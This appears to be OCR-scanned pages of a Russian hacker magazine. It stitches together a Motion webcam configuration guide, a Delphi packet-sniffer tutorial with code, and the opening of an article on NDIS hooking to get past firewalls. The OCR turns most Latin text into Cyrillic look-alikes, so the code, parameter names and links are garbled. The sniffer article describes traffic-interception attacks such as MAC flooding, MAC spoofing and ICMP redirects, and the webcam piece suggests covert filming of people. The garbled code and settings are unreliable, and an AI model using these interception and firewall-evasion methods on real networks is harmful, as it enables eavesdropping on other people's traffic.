Для подключения следует использовать порт, 
отличный отуказанного в ѵѵеЬсат_рогб За это 
отвечаетпараметр сопІгоІ_рогб Его значение по 
умолчаниюустановлено в 0, то есть данная функ- 
циональность также отключена. Меняем на 8080. 
По умолчанию параметр сопІгоІ_ІосаІбозІ активи- 
рован, поэтому если понадобится подключаться 
с удаленной системы, ставим здесь оД. А чтобы 
зайти на сервер не мог, кто попало, используем 
конструкцию: 

сопСго1_аиСІіепСісаСіоп изегпате: 
раззѵгогсі 

Указываем логин и пароль для аутентификации. Теперь, набрав в консоли 
«тобоп -п», среди строк вывода ты должен увидеть «тобоп-бйрсі: ѵѵаібпд 
Тэг сіаіа оп рогі ТОР 8080». Набираем в браузере адрес и получаем возмож- 
ность указывать настройки для каждой камеры (ібгеасі), выбирая их и вводя 
нужные значения. При работе с несколькими камерами такой способтебе, 
вероятно, покажется более удобным. 

В НАСТРАИВАЕМ ИЗОБРАЖЕНИЕ И ВИДЕО 

Итак, файлы у нас уже есть, бб:р-сервер работает, самое время заняться 
подстройкой. Атюнить в Мобоп есть что. Например, параметр гоіаіе. Ты не 
ошибешься, если подумаешь, что с его помощью можно вращать полу- 
ченное изображение. Поэтому если камеру удобнее закрепить в пере вер- 
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Списокзначений Мобоп с параметрами 



нутом виде, ничего страшного. Используемое по умолчанию 0 означает 
сохранение без вращения, возможны варианты 90, 1 80 и 270. При захвате 
устанавливается размер кадра, выдаваемый камерой, для его изменения 
редактируем параметры ѵѵісйб и беідбб Если камера не поддерживаетав- 
томатическую регулировку яркости, ее можно установить вручную. За это 
отвечает сразу несколько параметров. Так отключенный по умолчанию 
аи1ю_ЬгідЫ:пе55 разрешает Мобоп регулировать яркость. Ее величина 
берется из значения ЬгідЫіпезз, регулируемого в пределах 0-255. Если 
последнее установлено в 0, тогда аи1:о_ЬгідЫ:пе55 установит среднее 
значение 1 28. Аналогично за регулировку контраста и насыщенности 
отвечают соответственно сопігазі: и заіигабоп. Качество изображения 
регулируется с помощью циаіііу. Чтобы изменить формат файла с р е д на 
ррт, параметр ррт устанавливаем в оп. 

По умолчанию при обнаружении движения образуется не только видео- 
файл, но и последовательность изображений. Параметром ои!:риІ_погта[ 
можно изменить такое поведение. Так при установке в бгзі будетсохране- 
нотолько первое изображение, Ьезі: — лучшее, а отключить эту функцию 
можно, использовав оіТ. Активация оиІриІ_тобоп разрешит сохранять 
в снимке только пиксели, показывающие движущийся объект. Правда, 
пока я не нашел практического применения этому параметру, разве что 
для съемки продолжения «Охотники за привидениями». 

При установке пакета из репозитария ІІЬипІи в конфигурационном файле 
тобой. сопі функция записи захваченного видео отключена. Поэтому при 
необходимости измени значение ^тред_сар_пе\л/ на оп. Аналогично с 
ои{риІ_тобоп, есть такой же параметр и для видео — ^тред_сар_тобоп, 
при активации которого в результирующий видеофайл будут сохранены 
пиксели, показывающие движущийся объект. 

За качество результирующего видео отвечают два параметра: ^тред_Ьрз 
или 1^тред_ѵагіаЫе_ЬіІга1:е. При настройке следует использовать лишь 
один из них. Качество лучше подбирать экспериментальным путем, 
исходя из мощности системы и возможностей камеры. Кодек задается при 
помощи ^тред_у1с1ео_сос1ес, по умолчанию используется гпред4, но при 
необходимости можно использовать: треді , тзтред4, 5\лф йѵ или бѵі . 



В некоторых случаях полезной будет возможность периодической запи- 
си. Параметр ^тред_1іте1ар5е отвечаетза период, в течение которого 
ведется запись информации в один видеофайл, затем будет создан но- 
вый. Возможные значения: баііу (за день, по умолчанию), Ьоигіу, ѵѵеекіу- 
зипсіау, ѵѵеекіу-топсіау, топбііу и тапиаі. Например, чтобы запись на 
видео велась каждую секунду, устанавливаем «б : тред_бтеІарзе 1 ». 
Если во время захвата с аналоговой камеры при перемещении объектов 
появляются искажения, установи ІІтред_сІеіпІегІасе в оп. 

В файл, кроме собственно объекта, за которым следит камера, за- 
носится и дополнительная информация, позволяющая определить 
время съемки. Эти данные настраиваются в секции Бпарзбоіз. На- 
пример, установка цифры в 5пар5Ііо1:_іпі:егѵаІ позволит делать снимки 
с указанным периодом вне зависимости от обнаружения движения. 
Активация Іосаіе выделит на снимке движущийся объект. Текст, вы- 
водимый влевом и правом углах снимка, указывается соответственно 
в {ехОеЙ и Іех{_гідЫ. В настройках по умолчанию выводится дата и 
время, когда сделан снимок (формат 5ІгШте(3)). Если камер несколь- 
ко, для удобства можно активировать ІехМеіЧ, где прописать что-то 
вроде «Сатега 1 ». 

^ НАСТРОЙКА ЗАХВАТА 

Секция «Мобоп Оеіесбоп ЗеШпдз», расположенная в самом конце 
конфигурационного файла, отвечаетза тонкую настройку обнаружения 
движущихся объектов. Если камера стоит в комнате и тушка входящего 
перекрывает объектив, проблем с обнаружением обычно нет. Вмеша- 
тельство потребуется в том случае, когда камера контролирует большую 
территорию, где объект имеет относительно маленький размер, и сраба- 
тывание можетбыть вызвано колыханием ветокдеревьев, проезжающи- 
ми маши на мии прочими помехами. На дешевых девайсах запись может 
начинаться из-за артефактов, вызванных искажениями самой камеры 
или поведением драйвера. 

Например, Шгезбоісі позволяетуказать количество пикселей, которые 
должны измениться для срабатывания детектора, а тіпітит_тобоп_ 
ітатез — количество кадров, в котором они зафиксированы. Подобрав 
эти значения, можно сделать так, что Мобоп не будетзамечать проле- 
тающую птицу, но без проблем реагировать на человека. Фильтры для 
сглаживания шума подключаются при помощи сіезрескіе. Поумолчанию 
используется оптимальное значение ЕесЮІ. При появлении проблем 
следует поэкспериментировать, убирая буквы в сочетании ЕесЮІ и пробуя 
их в разных комбинациях (подробнее о сіезрескіе смотри на ѴѴіКі Мобоп и 
на етіббетоп.со.ик/гпобоп ). 

Параметры поізе_ІеѵеІ, поізе_Іипе, підЫ_сотрепзаІе и ІідЬЕзѵѵіІсЬ отве- 
чают за уровень порога шума и компенсациютемных и светлых участков. 
Комбинация параметров рге_сар1:иге, розІ_сарІиге и дар позволяет 
записать законченную сцену, где будетснят контролируемый объект до 
и послетого, какбыло обнаружено движение. Значение дар поумол- 
чанию установлено в оптимальные 60 (секунд), если движение не будет 
обнаружено, то создается новый видеофайл, а старый удаляется. Чтобы 
захваченный файл не был большим, его продолжительность можно огра- 
ничить параметром тах_тред_бте, указав в качестве значения время 
в секундах. 

Параметров в тобоп.сопі 1 очень много, обо всех рассказать не получится. 
Но остался еще один, о котором следуетзнать. Например, поставил ты 
камеру в общежитии на кухне, где топчется много народу, но тебя интере- 
суют л ишь те, которые лазят в холодильник. Без проблем, делаем снимок 
камерой, создаем маску, в которой нужная область окрашена белым, а 
все остальное, что нас не интересует, черным. Сохраняем его в файле 
формата рдт и указываем путь при помощи тазк_б1е. Все. Холодильник 
с пивом под присмотром. □с 
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НОУТБУК ВЫИГРАЛА АІ.ЕЫА ВАСНІЖША [А.ВАСНЦКШАгабМАІІ-.СОМ], КОТОРАЯ В ТЕСНОЙ 
КООПЕРАЦИИ СО СВОИМ МУЖЕМ РАНЬШЕ И ПОЛНЕЕ ВСЕХ ОТВЕТИЛА НА ВОПРОСЫ КОНКУРСА. 
ПОЗДРАВЛЯЕМ ПОБЕДИТЕЛЕЙ! 
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> который, не- 

че написать свой 31337-й сни 1 



будет обладать тем функционалом, который необходим именно тебе. 



0 ТЕОРИЯ 

Итак, начнем с определения. Снифер — это программа или аппаратное уст- 
ройство для перехвата сетевого трафика. Аппаратные сниферы нас сегодня 
интересовать не будут, а программные мы рассмотрим подробнее. 

Сниферы условно можно разделить по способу прослушивания сети. 
Прослушивание бываетактивным и пассивным. Сниферы, использующие 
этот пассивное прослушивание, просто переводятсетевую карту в режим 
ргогпізсиоив (неразборчивый). В этом случае становится возможным 
получить все пакеты в сегменте ЕіЬегпеС Сразу хочу развеять возможно 
возникшие иллюзии. Все пакеты ты сможешь увидеть только в том случае, 
если сеть построена на так называемых хабах (ЬиЬ). В сетях, где исполь- 
зуются устройства типа свитча (зѵѵйсЫ, такие фокусы не пройдут. Почему? 
Секрет кроется в работе сетевого устройства. Хабы — довольно безграмот- 
ныежестянки, одним словом, двоечники. Все пришедшие данные содного 
порта они передаютна все остальные, даже не задумываясь отом, на каком 
порту находится получатель, для которого эти данные, собственно, и были 
предназначены. Свитчи — это своего рода отличники. Они с немецкой 
дотошностью проверяютзаголовки пришедших кадров данных и пере- 
сылают их в другой сегменттолько втом случае, если в нем есть истинный 



получатель. Сниферы, применяющие активное прослушивание сети, более 
продвинуты. Для перехвата тяжелого трафика они используют разные 
способы. Наиболее известные из них: 

1. МАС Ріообіпд. Актуален для устаревших свитчей. Суть этого метода 
состоит в следующем: многие старые свитчи имели лимит памяти, в 
которой хранилась адресная таблица. Если умудриться ее зафлудить, свитч 
переставал проверять данные перед их отправкой и просто слал их на все 
порты, подобно обычному хабу. Способ достаточно прост в реализации, но, к 
сожалению, таких свитчей найти сейчасуже практически нереально. 

2. МАС Оиріісайпд. Этот способ активного прослушивания заключается 

в изменении своего МАС на МАС жертвы. В результате все отправляемые 
жертве пакеты будут дублироваться и тебе. 

3. Роийпд айаскв. Этотспособ основан на отправке жертве фальшивых 
сообщений ІСМР Ресіігесі. Они используются роутерами для сообщения 
узлу адреса нового роутера, но с более коротким путем для запрашиваемого 
узла. Таким образом, можно в качестве адреса нового роутера подставить 
адрес своей тачки, и все пакеты будут проходить через твой комп. При- 
менение этого способа осложняется игнорированием современными ОС 
сообщений ІСМР РесНгесС 
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г СНИФЕР С ТОЧКИ ЗРЕНИЯ КОДЕРА 

С позиции программирования наиболее простыми в реализации являются 
сниферы, использующие пассивное прослушивание. Сейчас можно найти 
кучу готовых драйверов, которые занимаются перехватом трафика. Все, что 
остается, — изучить хелп по работе с ними и написать свою программу-ин- 
терфейс. Подобным образом и работают многие известные сниферы. Если 
ты думаешь, что это несерьезно, то спешу огорчитьтебя. Хороший снифер 
должен уметь не только захватывать данные, но и разбирать их, а это уже 
достаточно серьезная задача. 

Из драйверов для перехвата трафика чаще всего используется ѴѴіпРСар 
[ ѵѵѵѵѵѵ.ѵѵіпрсар.огд ]. Этот драйвер один из немногих поддерживает все ЫТ 
версии ѴѴіпсІоѵѵз, поэтому его можно юзать, не опасаясь, что твое творение 
где-то вылетите ошибкой. 

Если тебе не хочется заморачиваться с драйверами, можно пойти более 
простым путем — использовать гаѵѵзоскеіз (сырые сокеты). Такой тип 
снифера реализовать тоже достаточно просто, а если учесть, что в рубрике 
«Кодинг» я уже неоднократно приводил примеры сетевых приложений с 
использованием ѴѴіпЗоскАРІ, то задача становится и вовсетривиальной. 

^ УНИВЕРСАЛЬНЫЕ КОМПОНЕНТЫ 

Сегодня мы создадим снифер, который будет поддерживать работу с 
помощью двух технологий: используя драйвер ѴѴіпРСар и РАѴѴЭоскеТ Для 
воплощения этой безумной идеи я решил найти какую-нибудь универсаль- 
ную библиотеку компонентов. Признаюсь честно, вначалея даже не думал, 
что это возможно. Но немного погуглив, я наткнулся на очень интересный 
наборчик— Мадепіа Эузіетв Іпіегпеі: Раскеі: Мопііогіпд Сотропепіз ( ѵѵѵѵѵѵ. 
таазѵз.со.ик ). 

Эта полезная библиотека состоит из двух главных невизуальных компо- 
нентов: ТМопКогРСар (взаимодействуете ѴѴіпРСар) и ТМопіІогЗоскеІ: 
(использует сырые сокеты). Оба компонента написаны достаточно хорошо, 
и глюков при их использовании замечено не было. Давай рассмотрим их 
возможности. 

Все свойства и методы обоих компонентов перечислены в соответствующих 
таблицах. В них не попало описаниетолько одного-единственного обработ- 
чика события — ТРаскеіЕѵепС Событие описано следующим образом: 

ТРаскебЕѵепб = ргосебиге (Зепбег: ТОЬзесР; Раскебіпбо : 
ТРаскебІпбо) об оЬзесС; 

Первый параметр пояснять, я думаю, не нужно, поскольку если ты програм- 
мируешь на ОеІрЬі, то знать это просто обязан, а вот второй рассмотрим 
подробнее. Во втором параметре передается структура типа ТРаскеІІпЬ, в 
которой и хранятся все захваченные данные. Структура описана так: 

ТРаскебІпбо = гесогб 
РаскеДЬеп: іпбедег ; 

ЕбЬегРгобо : ѵгогсі ; 

ЕбЬегЗгс : ТМасАббг ; 

ЕбЬегБезб : ТМасАббг ; 

АббгЗгс: ТІпАббг ; 

АббгБезб : ТІпАббг ; 

РогкЗгс: іпбедег ; 



РогСБезб : іпбедег ; 

РгобоТуре: Ъубе ; 

ТсрЕІадз : ѵгогсі ; 

ЗепбРІад: Ьооіеап ; 

I сшрТу р е : Ьу б е ; 

БабаБеп: іпкедег; 

БаСаВиб : збгіпд ; 

РаскебБТ: ТБабеТіте ; 
епб ; 

— раскебБеп — длина полученного пакета. 

— ЕбкегРгобо — тип ЕбЬегпеб -протокола . Может быть: РБР, 
ХИЗ, ІР, АКР , КАРР, ЗСА, ІРѵб , БООР, ХІМТ, ІРХит.д. Пол- 
ное описание можешь посмотреть в раскЪбгз .раз . 

— ЕбЬегЗгс — МАС-адрес отправителя. 

— ЕбкегБезб — МАС-адрес получателя. 

— АббгЗгс — ІР отправителя. 

— АббгБезб — ІР получателя. 

— РогСЗгс — порт отправителя. 

— РогСБезб — порт получателя. 

— РгобоТуре — тип транспортного протокола . Может быть : 
ІРРКОТО_ТСР (ТСР) , ІРРКОТО_ББР (ЦБР) , ІРРКОТО_ІСМР) . 

— ТсрЕІадз — флаги ТСР/ІР-пакетов . 

— ЗепбРІадз — истина, если пакет отправлен с локального 
ІР. 

— ІсшрТуре — тип ІСМР-пакета. Возможные значения: ЕСНО_ 
КЕРБАУ, БЕЗТ_ШКЕА, ЗКС_0, КЕБІК, ЕСНО, ТТБХ, ВАБРАК, 
ТІМЕ, ТІМЕ_КЕРБУ, ШРО, ІЫРО_КЕРБУ. 

— БабаБеп — длина захваченных данных. 

— БабаВиб — сами данные . 

— РаскебБТ — время, в которое был захвачен пакет. 

Н ОТ ТЕОРИИ К ПРАКТИКЕ 

Пришло время закончить стеорией и перейти креальной работе. Сейчас 
мы стобой напишем самый настоящий снифер в, казалосьбы, неприспо- 
собленной для этого среде. Запускай ОеІрЬі и создавай новый проект. Как 
создашь, сразу же добавь в ІІзез имена модулей компонентов отМБІРМС. 

В своем проекте я добавил топзоск, топрсар, ѴѴЗоскеІ, раскеЕ32, рсар, 
ѴѴіпзоск, тадзиЬзІ , РаскМгз. 

Сохрани проект и попробуй его откомпилировать. Если компиляция прой- 
детуспешно, значит Оеірбі смогнайти указанные модули, если нет — ты 
забыл прописать пути, по которым расположены модули. 

^ ДЕЛАЕМ ФОРМУ 

Для сегодняшнего примера я сделал простенькую форму, которая пред- 
ставлена на одном из рисунков. По всей форме я растянул ТРадеСопІгоІІ и 
создал две закладки: «Настройки» и «Лог». 

Закрой новоиспеченную форму и перейди в раздел ргіѵабе. Объяви в нем 
следующие переменные и процедуры: 

_топМіпРСар : ТМопібогРСар ; 

_топВаѵѵЗоскеб : ТМопібогЗоскеі: ; 
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Официальный сайт разработчиков ѴѴіпРСар 

_пасІо : Ьооіеап; 

_асІаркегІрЬізк : ТЗкгіпдЬізк; 

_ас!аркегМазкЬізк : ТЗкгіпдЬізк; 

_аЬаркегЬгоасІсазкЬізк : ТЗкгіпдЬізк ; 
ргосесіиге Іпікіаііге ( ) ; 
ргосеЬиге КекгезЬіпко ( ) ; 

ргосесіиге СекРаскек (Зепсіег : ТОк^еск; Раскекіпко: 
ТРаскекІпко) ; 

Рассмотрим сначала процедуру ІпібаІігеО. Ее вызов необходимо повесить на 
0пСгеа1:е формы. Сама начинка процедуры описана в соответствующей врезке. 
Пока ты переписываешь листинг, я прокомментирую происходящее. Итак, 
как я уже сказал, эта процедура должна вызываться во время создания 
формы и ее единственная цель — инициализация всех необходимых 
объектов. Первое, что я делаю в процедуре, — создаю компоненты типа 
ТМопкогЭоскеІ: и ТМопкогРСар. Обоим компонентам я устанавливаю про- 
цедуру, которая будет выполняться всякий раз, когда возникнет событие 
ОпРаскеіЕѵепк Основной код этой процедуры приведен в соответствую- 
щем листинге. Кактолько ТМопкогРСар инициализировался, нам сразу 
становится доступно свойство АбарІегОезсЕІБк в котором уже дожидается 
список доступных сетевых адаптеров. Все найденные адаптеры я перено- 
шу в соответствующий СотЬоВох на форме: 

сЬхАЬаркегз . Ікетз . Аззідп (_топМіпРСар . АЬаркегБезсЬізк) ; 

Кстати, попробуй прямо сейчас протестировать наше приложение. Ском- 
пиль и попробуй запустить — СотЬоВох'ы для хранения списка сетевых 
адаптеров и ІР-адресов должны заполниться. 

После получения очередной порции данныхуправление будет передавать- 
ся процедуре беіРаскеШ- Код процедуры приведен во врезке. 

Перед выводом данных в лог нужно проверить состояние флажка 
сЬРиІЮаІа («Выводить полученные данные целиком»). Если он тру, 
тогда будем добавлять в лог все захваченные пакеты. Получаем сами 
данные: 

_Ь := Раскекіпко . БакаВик ; 

Теперь их необходимо как-то разобрать. Сначала я пропускаю данные через 
функцию 5ігіпдПетСпиз() из модуля тадзиЬзІ .раз. Эта функция заменяет 
управляющие коды пробелами. Это делать не обязательно, но желательно, 
поскольку читабельность полученной информации заметно возрастет. 

Когда суправляющими кодами будет покончено, переходим к более де- 
тальному разбору. В зависимости оттекущего типа данных я вызываю всем 
известную функцию ЬгтаТ которая форматирует строку в соответствии с 
шаблоном. Шаблон у меня определен в константе зРІ_: 

зРІ = ' %-12з %-4з %4сі %-20з > %-20з %-12з %4сІ %з ' ; 



Метод 


Параметры 


Описание 


ЗаитМошок 


Нет 


Запустить мониторинг 


ЗторМошов 


Нет 


Остановить мониторинг 


ЗетіѳмокеіР 


ірАоокібткшо 


Добавить ІР в список игнорируемых 


СЬЕАВІОМОНЕІР 


Нет 


Очищает список ІР в игноре 



Общие методы ТМопкогЭоскеІ и ТМопкогРСар 



Отрывок процедуры 
вывода пакета в окно 
лога 

іі (пок сЬЕиІІБака . СЬескесІ) апЬ (Раскекіпко. 
БакаЬеп>96) кЬеп 

ЗекЬепдкЬ (Раскекіпко . БакаВик , 96) ; 

_Ъ := РаскекІпко.БакаВик; 

ЗкгіпдКегпСпкІз (_Ь) ; 

ік Раскекіпко . ЕкЬегРгоко = РРОТО_ІР Скеп 
Ьедіп 

згсір : = ІРТоЗкг (Раскекіпко .АскігЗгс) + 1 : ' + 

ІпкТоЗкг (Раскекіпко . РогкЗгс) ; 

_Ьізкір := ІРТоЗкг ( Раскекіпко . АсМгВезк ) + 1 : ' + 
ІпкТоЗкг (Раскекіпко . РогкБезк) ; 

ік Раскекіпко . РгокоТуре = ІРРКОТО_ІСМР скеп 
_а : = Рогшак (зРЬ, 

[ТішеТо23кг ( Раскекіпко . РаскекБТ) , 
СекІРРгокоЫаше (Раскекіпко. РгокоТуре) , 
зРЬ , 

_згсІр, 

_с!ізкІр , 

Іоѵ/егсазе (СекІСМРТуре (Раскекіпко. 

ІсшрТуре) ) , 

Раскекіпко . БакаЬеп, _Ь] ) 

еізе 

Ьедіп 

ік (Раскекіпко . БакаЬеп = 0) кЬеп 
_Ь := СекРІадз (Раскекіпко. ТсрРІадз) ; 

_а : = Рогшак (зРЬ, 

[ТітеТоЕЗкг ( Раскекіпко . РаскекБТ) , 
СекІРРгокоЫаше (Раскекіпко. РгокоТуре) , 
Раскекіпко . РаскекЬеп , 

_згсІр, 

_ЬізкІр, 

Ьомегсазе (СекЗегѵісеЫашеЕх (Раскекіпко. 
РогкЗгс, Раскекіпко . РогкБезк ) ) , 

Раскекіпко . БакаЬеп, _Ъ] ) ; 

епсі; 

епсі 

еізе 

Ьедіп 

_а := Рогшак (зРЬ, 

[ТішеТоЕЗкг ( Раскекіпко . РаскекБТ) , 
СекЕкЬегРгокоЫаше (Раскекіпко . ЕкЬегРгоко) , 
Раскекіпко . РаскекЬеп , 

МасТоЗкг (Раскекіпко . ЕкЬегЗгс) , 

МасТоЗкг ( Раскекіпко. ЕкЬегБезк) , 

Раскекіпко . БакаЬеп , 

_Ы) ; 

епЬ; 

геЬод.Ьіпез . АЬЬ (_а) ; 

епЬ; 
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Журнал 
для тех, у кого 

- это просрессия! 



► Советы Шпих- 
администратору 

► Росийский рынок 
разработки ПО 

► Аналитика, интервью, 
опросы, мнения экспертов 





согііпд 



Свойство 


Тип 


Описание 


Аооя 


5тяше 


ІР КОТОРЫЙ БУДЕТ «ПРОСЛУШИВАТЬСЯ» 


АоркМабк 


Зтяше 


МАСКА, ДЛЯ ИГНОРИРУЕМЫХ ІР 


іомояеОата 


ВООЬЕАЫ 


Игнорировать полученные данные 


ІеиояЕІ-АІ'І 


ВООЬЕАЫ 


Если в АоояМабк установлена МАСКА, АЗДЕСЬТЯЦЕ, 
ТО БУДУТ ИГНОРИРОВАТЬСЯ ІР ПОДАННОЙ МАСКЕ 


ТотЗеыоВѵтеб 


Іыт64 


Количество отправленных байт 


ТотРесѵВѵтеб 


Ыт64 


Количество полученных байт 


Тот5еыоРаскет5 


ЫТЕОЕЯ 


Количество отправленных пакетов 


ТотРесѵРаскетб 


ЫТЕОЕЯ 


Количество принятых пакетов 



Общие свойства ТМопіІогЗоскеІ: и ТМопіІогРСар 



Отформатированные данные добавляются в РісЬЕсІіР Наверняка ты 
заметил имена неизвестныхтебе функций вроде ІРТоЗігО, ОеЕІСМ РТуреО 
ит.п. Все они описаны в модулях раскЬбгз.раз и тадзиЬзІ .раз и призваны 
облегчить процесс разработки. Например, функция ІрТоВігЦ позволяет 
выудить из структуры ТіпАсісіг ІР-адрес в виде строки. Заглянув в модули, 
нашел интересные функции, которые могут пригодиться не только при про- 
граммировании сниферов, но и при разработке других программ. Советую и 
тебе хорошенько покопаться в них. 




^ ФИНАЛЬНЫЙ ТЕСТ 

Возьми пример с нашего диска и посмотри код запуска монитора. Пере- 
пиши/скопируй его в свой проект и запусти, пора тестировать снифер в 
боевыхусловиях. 

Во время тестирования программы у меня на всю катушку работал Іоггепі- 
клиенти Орега. Если хорошенько присмотреться клогу.то можноувидеть 
трафикбраузера, который был поснифан. Можно считать тестоконченным и 
успешно пройденным. □С 




//Мониторинг сырых сокетов 

_топКаѵ73оскеР := ТМопіРогЗоскеР . СгеаРе ( зеіб ) ; 
_топКа\л73оскеР . ОпРаскеРЕѵепР : = СеРРаскеР ; 
сЬхІрРогСопРгоІІ . ІРешз . Сіеаг; 
сЬхІрРогСопРгоІІ . ІРешз := ЬосаІІрЬізР; 

іб (сЬхІрРогСопРгоІІ . ІРешз . Соипр>0 ) Ркеп 
сЬхІрРогСопРгоІІ . ІРетІпсІех := 0; 

//Рели доступен МіпРСар 
іб ( ІоасІРаскеРЫІ ) Ркеп 

_топМіпРСар := ТМопіРогРСар . СгеаРе ( зеіб) ; 
_топДОіпРСар . ОпРаскеРРѵепР : = СеРРаскеР ; 

//Получаем список доступных сетевых адаптеров 
сЬхАЬарРегз . ІРешз .Сіеаг; 
сЬхАЬарРегз . ІРешз . Аззідп (_топМіпРСар . 
АсІарРегБезсЫзР) ; 

//Рели в системе присутствует хоть один адаптер, 

// значит нам есть чем заняться : ) 

1 1 ( сЬхАЬарРегз . I Р ешз . Сошір > 0 ) Р 1 іеп 
Ьедіп 

сЬхАЬарРегз . ІРетІпсІех := 0; 
сЫізеМіпРСар.Скескес! := Ргие; 
сЬРготізсиоиз . Скескесі := Ргие; 
сЫдпогеЫопІр . Скескесі := Ргие; 

_ас1арРегІрЬІ8Р := ТЗРгіпдЬізР .СгеаРе; 
_асіарРегМазкЬізР := ТЗРгіпдЬізР.СгеаРе; 
_асІарРегВгоасІСазРЬізР := ТЗРгіпдЬізР.СгеаРе; 
епб 
еізе 
Ьедіп 

ЗкомМеззаде ( 'Не обнаружен ни один сетевой адап- 
тер ! ' ) ; 

АррІісаРіоп . ТегшіпаРе ; 



ЕпЬ; 

_пабо := баізе; //Мониторинг сырых сокетов 
_шопВ.амЗоскеР := ТМопіРогЗоскеР.СгеаРе(зеІб); 
_шопКам'ЗоскеР . ОпРаскеРРѵепР : = СеРРаскеР ; 
сЬхІрРогСопРгоІІ . ІРешз . Сіеаг ; 
сЬхІрРогСопРгоІІ . ІРешз := ЬосаІІрЬізР; 

іб (сЬхІрРогСопРгоІІ . ІРешз .СоипР>0) Ркеп 
сЬхІрРогСопРгоІІ . ІРетІпсІех : = 0 ; 

//Рели доступен ДОіпРСар 
іб ( ІоасЗРаскеРБІІ ) Ркеп 

_топѴ7іпРСар := ТМопіРогРСар . СгеаРе ( зеіб ) ; 
_шопѴ7іпРСар . ОпРаскеРРѵепР := СеРРаскеР; 

//Получаем список доступных сетевых адаптеров 
сЬхАЬарРегз . ІРешз . Сіеаг; 
сЬхАЬарРегз . ІРешз .Аззідп (_шопѴ7іпРСар . 
АЬарРегБезсЬізР) ; 

//Рели в системе присутствует хоть один адаптер, 
//значит нам есть чем заняться : ) 

Іб (сЬхАЬарРегз . ІРешз .Соипр>0) Ркеп 
Ьедіп 

сЬхАсіарРегз . ІРетІпсІех : = 0 ; 
сЫізеМіпРСар . Скескеб := Ргие; 
сЬРготізсиоиз . Скескеб. := Ргие; 
сМдпогеЫопІр . Скескеб := Ргие; 

_абарРегІрЬізР := ТЗРгіпдЬізР.СгеаРе; 
_абарРегМазкЬізР := ТЗРгіпдЬізР.СгеаРе; 
_абарРегВгоабСазРЬізР := ТЗРгіпдЬізР.СгеаРе; 
епб 
еізе 
Ьедіп 

ЗкомМеззаде ( 'Не обнаружен ни один сетевой адап- 
тер ! ' ) ; 

АррІісаРіоп . ТегшіпаРе ; 

Епб; 

_пабо := баізе; 
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[АЛЕКСАНДР ЭККЕР' 



АІ_ЕК5АМРК-ЕНККЕКТ(дКАМВІ.ЕК.РШ 



согііпд 



В МЕТОДЫ ПЕРЕХВАТА СЕТЕВОГО ТРАФИКА 

На практике в среде ѴѴіпсІоѵѵз используются пять методов перехвата 
сетевого трафика: 

1 - 2 ) Фильтрация сетевого трафика в ІІзег-тосІе без написания каких- 
либо драйверов. Известны и документированы такие способы, как 
ѴѴіпзоск І_ауегесІ 5егѵісе Ргоѵісіег (1_5Р) и ѴѴіпсІоѵѵз 2000 Раскеі РіНегіпд 
ІпІеНасе. К преимуществам первого стоит отнести то, что он позволяет 
отследить вызовы к библиотеке ѴѴіпЗоск и может использоваться, ска- 
жем, для шифрования сетевого трафика. 

Второй способ в ѴѴі псіоѵѵз 2000 представляет собой механизм, позволя- 
ющий приложению установить набор «Шегсіезсгіріогз», на основе кото- 
рого ТСР/ІР выполняетфильтрацию пакетов. Оба метода, на мой взгляд, 
малоэффективны, накладываютопределенные ограничения и реальной 
защиты не предоставляют. Поэтомулезем глубже... 

3) Промежуточный драйвер N015 — N015 ІМ. 

Он устанавливается между Ы0І5-драйвером и драйвером сетевой 
карты. МісгозоК предусмотрела этот класс драйверов как раз для нужд, 
подобных нашим (ну, не совсем нашим :)), однако их функциональность в 
операционных системах ѴѴі псіоѵѵз 98/МЕ/ЫТ оставляетжелать лучшего, 
а в ѴѴі псіоѵѵз 95 отсутствует вовсе. Он неудобен в установке, тем не менее, 
встречаются файрволы, которые реализуютсвою функциональность при 
помощи N015 ІМ. Желающие могут изучить N015 ІМ РАО и документацию 
вООК. 

4 ) Драйвер-фильтр, фильтрующий сетевые пакеты. 



По утверждению той же самой МісгозоК, использовать его в качестве 
фильтра не стоит. Всего лишь одна ловушка может быть установлена в 
системе, причем устанавливается она на слишком большой высоте в 
сетевом стеке. 

5 ) N015-400^9 Рі Не г драй вер, перехватывающий основные функции 
N015 для отслеживания регистрации протоколов и открытия сетевых 
интерфейсов. 

Это наиболее надежный способ, поэтому именно его использует 
подавляющее большинство файров. Конкретные методики перехвата 
достаточно разнообразны, но сводятся, такилииначе.к патчу «род- 
ного» N015 драйвера в памяти, что несравненно проще реализации 
промежуточного N015 драйвера с нуля (под хуками здесь подразумева- 
ется как патчингтаблицы экспорта, так и непосредственный патч кода 
псііз.зуз). 

Реализация N015-1-100^09 позволяет создать подобие оболочки над са- 
мой библиотекой N015 и аналогична методу перехвата системных серви- 
сов, о котором не раз писал «Пакер». Адреса необходимых функций биб- 
лиотеки N015 заменяются «подставными» обработчиками, в результате 
чего можно получить контроль над всеми сетевыми операциями в систе- 
ме. Вывод напрашивается сам собой: перехватив МІ5РедІ5ІегРго1:осоІ[]/ 
ШізОегедізІегРгоІосоК), №І50репАсІарІег()ЛѵІсІІ5СІО5еАсІарІег(), можно 
отследить загрузку сетевого драйвера, затем установить адреса своих 
обработчиков для точек входа отдельных процедур и контролировать все 
сетевые операции ввода/вывода, проходящие через драйвер. Воттак и 












ѵ 






Комплексные системы безопасности и файрволы душат тебя? Ограничива 



свободуи не ^даі^л^)граммному обеспечен^^шю^^о вь^^^^ь 
й)нет? Тебе плб^^І^^осешают мысли о само^^^штве? Погоі^^^^ 



интер нет? Тебе плохо, т ебя п осещают мысли о самоуб ийстве? П оговорим 
м? Начнет, не осамо^^шствеЛГ^пе^іобеседѵем о кодеоских метода: 



о этом : 7 да нет, н е о с амоуоиистве. л учше п ооеседуем о кодерс ких м етодах 
оторые помогут нам потягаться с Оиірозі: и ІМОР32.^г 



— 
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В КЛЮЧЕВЫЕ СТРУКТУРЫ 

Для борьбы с перехватом на уровне ядра необходимо 
уметь обращаться с несколькими ключевыми структурами 
библиотеки N015 - М0І8_0РЕМ_ВІ_0СК, М0І5_РР0Т0С0І__ 
ВБОСК, переменной пбівРгоІосоіизІ:, ну и еще со структурой 
М0І5_МІМІР0РТ_ВІ_0СК (о ней мы поговорим чуть позже). 



СТРУКТУРА М0І5_РК0Т0С0І__ВІ_0СК 

Еурес1еЕ 

зЕгисЕ _ШІЗ_РК0Т0С0Ь_ВЬ0СК 

{ 

РЫБІЗ_ОРЕЫ_ВЬОСК ОрепВІоск; 
ВЕЕЕКЖІСЕ КеЕегепсе; 
иШТ ЬепдЕЬ; 



\ 



родных псііз’овских зарегистрированных функций на свои 
собственные. При этом необходимо иметь в виду, что неко- 
торые N015 макросы вызывают функции поуказателям не 
